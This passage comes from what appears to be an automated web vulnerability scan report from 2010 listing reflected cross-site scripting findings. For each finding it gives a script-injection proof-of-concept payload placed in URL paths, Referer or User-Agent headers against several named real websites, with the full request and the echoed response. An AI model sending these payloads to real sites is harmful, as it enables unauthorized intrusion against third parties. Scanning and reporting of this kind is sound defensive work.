Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04f2"><script>alert(1)</script>3fa8d97dfe0 was submitted in the REST URL parameter 2. This input was echoed as e04f2\"><script>alert(1)</script>3fa8d97dfe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jse04f2"><script>alert(1)</script>3fa8d97dfe0/jquery/ui.core.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:42 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/jse04f2\"><script>alert(1)</script>3fa8d97dfe0/jquery/ui.core.js" />
...[SNIP]...

1.243. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d160"><script>alert(1)</script>4926c1ae6ab was submitted in the REST URL parameter 3. This input was echoed as 8d160\"><script>alert(1)</script>4926c1ae6ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery8d160"><script>alert(1)</script>4926c1ae6ab/ui.core.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:45 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery8d160\"><script>alert(1)</script>4926c1ae6ab/ui.core.js" />
...[SNIP]...

1.244. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4589"><script>alert(1)</script>0f9b40857bd was submitted in the REST URL parameter 4. This input was echoed as b4589\"><script>alert(1)</script>0f9b40857bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.core.jsb4589"><script>alert(1)</script>0f9b40857bd HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:46 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/ui.core.jsb4589\"><script>alert(1)</script>0f9b40857bd" />
...[SNIP]...

1.245. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.tabs.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6e3"><script>alert(1)</script>037cd5f80a0 was submitted in the REST URL parameter 1. This input was echoed as dc6e3\"><script>alert(1)</script>037cd5f80a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesdc6e3"><script>alert(1)</script>037cd5f80a0/js/jquery/ui.tabs.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includesdc6e3\"><script>alert(1)</script>037cd5f80a0/js/jquery/ui.tabs.js" />
...[SNIP]...

1.246. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 639ff"><script>alert(1)</script>4a985ca9c86 was submitted in the REST URL parameter 2. This input was echoed as 639ff\"><script>alert(1)</script>4a985ca9c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js639ff"><script>alert(1)</script>4a985ca9c86/jquery/ui.tabs.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:44 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js639ff\"><script>alert(1)</script>4a985ca9c86/jquery/ui.tabs.js" />
...[SNIP]...

1.247. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.tabs.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fc2"><script>alert(1)</script>d944b3fa538 was submitted in the REST URL parameter 3. This input was echoed as e9fc2\"><script>alert(1)</script>d944b3fa538 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquerye9fc2"><script>alert(1)</script>d944b3fa538/ui.tabs.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:45 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquerye9fc2\"><script>alert(1)</script>d944b3fa538/ui.tabs.js" />
...[SNIP]...

1.248. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.tabs.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c078c"><script>alert(1)</script>f268c87e34f was submitted in the REST URL parameter 4. This input was echoed as c078c\"><script>alert(1)</script>f268c87e34f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.tabs.jsc078c"><script>alert(1)</script>f268c87e34f HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:46 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/ui.tabs.jsc078c\"><script>alert(1)</script>f268c87e34f" />
...[SNIP]...

1.249. http://www.sitebrand.com/xmlrpc.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d690e"><script>alert(1)</script>14dcf4a04ab was submitted in the REST URL parameter 1. This input was echoed as d690e\"><script>alert(1)</script>14dcf4a04ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.phpd690e"><script>alert(1)</script>14dcf4a04ab HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:32 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/xmlrpc.phpd690e\"><script>alert(1)</script>14dcf4a04ab" />
...[SNIP]...

1.250. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63671"-alert(1)-"cf18d483ee4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;
Referer: http://www.google.com/search?hl=en&q=63671"-alert(1)-"cf18d483ee4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Content-Length: 1258
Date: Fri, 26 Nov 2010 20:41:52 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
{
            adsafew = encodeURIComponent(window.document.referrer);
   } catch (adsafeq) {
   }
        if (null == adsafew || adsafew.length == 0) {
                adsafew = "http://www.google.com/search?hl=en&q=63671"-alert(1)-"cf18d483ee4";
            adsafet = 'jsref';
            }
        }
       }
   }
}
document.write('<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?adsafe_url='+a
...[SNIP]...

1.251. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.nypost.com
Path:   /homedelivery/signup.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad343"><script>alert(1)</script>9f8d47d8d9d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homedelivery/signup.htm HTTP/1.1
Host: secure.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ad343"><script>alert(1)</script>9f8d47d8d9d

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.0
Content-Length: 6262
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerNYPOST-SSL-POOL=184592576.47873.0000; expires=Sat, 27-Nov-2010 04:25:09 GMT; path=/

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=ad343"><script>alert(1)</script>9f8d47d8d9d" />
...[SNIP]...

1.252. https://webid2.gs.com/cgi-bin/10kw/login.cgi [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://webid2.gs.com
Path:   /cgi-bin/10kw/login.cgi

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6341e"><script>alert(1)</script>a7058016663 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/10kw/login.cgi HTTP/1.1
Host: webid2.gs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6341e"><script>alert(1)</script>a7058016663

Response

HTTP/1.0 500 Internal Server Error
Date: Fri, 26 Nov 2010 20:24:34 GMT
Server: Apache
GS_AUTH_STATUS: FAILURE
GS_AUTH_SUB_STATUS: ERROR
GS_AUTH_STATUS_MESSAGE: An internal error has occured; check server logs for more detail.
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_xfcje2.ht.dpn-443-wc=ffffffff09c43f5b45525d5f4f58455e445a4a420e6f;path=/;secure

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<?xml version="1.0" encoding="UTF-8" ?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<t
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=6341e"><script>alert(1)</script>a7058016663">
...[SNIP]...

1.253. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f2f20<script>alert(1)</script>12272eecd75 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f2f20<script>alert(1)</script>12272eecd75

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>f2f20<script>alert(1)</script>12272eecd75 - Google search</h4>
...[SNIP]...

1.254. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c4d1"><script>alert(1)</script>18475beb865 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9c4d1"><script>alert(1)</script>18475beb865

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=9c4d1"><script>alert(1)</script>18475beb865" />
...[SNIP]...

1.255. http://www.adoutput.com/version2/hit_rm.cfm [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.adoutput.com
Path:   /version2/hit_rm.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7938b<script>alert(1)</script>5c68a4a8479 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /version2/hit_rm.cfm HTTP/1.1
Host: www.adoutput.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7938b<script>alert(1)</script>5c68a4a8479
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Nov 2010 20:24:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7938b<script>alert(1)</script>5c68a4a8479</td>
...[SNIP]...

1.256. http://www.mysite.com/x/y/MyPage.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mysite.com
Path:   /x/y/MyPage.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 56af3--><script>alert(1)</script>57134f82163 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /x/y/MyPage.asp HTTP/1.1
Host: www.mysite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=56af3--><script>alert(1)</script>57134f82163

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:22:58 GMT
Server: .V10 Apache
Keep-Alive: timeout=999999, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 13277

<meta http-equiv="Set-Cookie" content="signup_refer=1:%2C:http://www.google.com/search%3Fhl%3Den%26q%3D56af3--%3E%3Cscript%3Ealert%281%29%3C/script%3E57134f82163; expires=Sun, 26-Dec-2010 20:22:58 GMT
...[SNIP]...
<!--|10|1290802978|174.122.23.218|http://www.google.com/search?hl=en&q=56af3--><script>alert(1)</script>57134f82163|-->
...[SNIP]...

1.257. http://www.quantcast.com/p-e4QUTcIS3_f12 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.quantcast.com
Path:   /p-e4QUTcIS3_f12

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2550"><script>alert(1)</script>754871af0ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /p-e4QUTcIS3_f12 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2550"><script>alert(1)</script>754871af0ad

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: qcVisitor=0|32|1290803013112|0|NOTSET; Expires=Sun, 18-Nov-2040 20:23:33 GMT; Path=/
Set-Cookie: JSESSIONID=515AACA53ADC280202AB321E2952A6B0; Path=/
Set-Cookie: qcPageID="10.122.9.112,8000,74,Fri, 26 Nov 2010 20:23:33 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Fri, 26 Nov 2010 20:23:32 GMT
Connection: close

